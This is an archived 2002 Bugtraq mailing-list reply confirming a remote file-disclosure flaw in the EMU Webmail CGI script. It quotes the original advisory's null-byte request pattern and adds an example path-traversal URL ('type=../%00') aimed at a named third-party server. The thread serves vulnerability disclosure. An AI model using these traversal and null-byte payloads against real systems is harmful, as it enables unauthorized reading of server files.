[24977] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: emumail.cgi

daemon@ATHENA.MIT.EDU (Tom Micklovitch)
Fri Apr 5 14:29:24 2002

Message-ID: <20020405085531.27269.qmail@web20302.mail.yahoo.com>
Date: Fri, 5 Apr 2002 00:55:31 -0800 (PST)
From: Tom Micklovitch <h_bugtraq@yahoo.com>
To: bugtraq@securityfocus.com
In-Reply-To: <20020404011112.12478.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii


--- acidneo@altern.org wrote:
> name            : emumail.cgi
> date            : 04/04/2002
> description     : EMU Webmail: how to check
> your email
> from the web. 
> severity        : Low/average-risk
> homepage        : www.emumail.com
> 
> Any user can view files on the remote system:
> xxx/PATH/emumail.cgi?type=FILE%00
> 
> 
> 
> The vendor were contact about that
> 
> 

confirmed on nph-emumail.cgi
(see http://q1.quik.com/quikmail/nph-emumail.cgi?type=../%00)

=====
-----BEGIN GEEK CODE BLOCK-----
  Version: 3.1 www.geekcode.com
GIT d--(---) s-:-- a-- C++++ UL@ P--- L++>+++ E---(-) W+++(-)$ N-(--) o-- K++ w(+)(-) O? !M ?V(-) PS+++@ PE-- Y+ PGP++ t+ 5-(++) X(+) R tv(--) b+>+++ DI++ D- (Quake+++) G+>++ e* h r++>+++ y+(+++)
-----END GEEK CODE BLOCK-----

__________________________________________________
Do You Yahoo!?
Yahoo! Tax Center - online filing with TurboTax
http://taxes.yahoo.com/

home	help	back	first	fref	pref	prev	next	nref	lref	last	post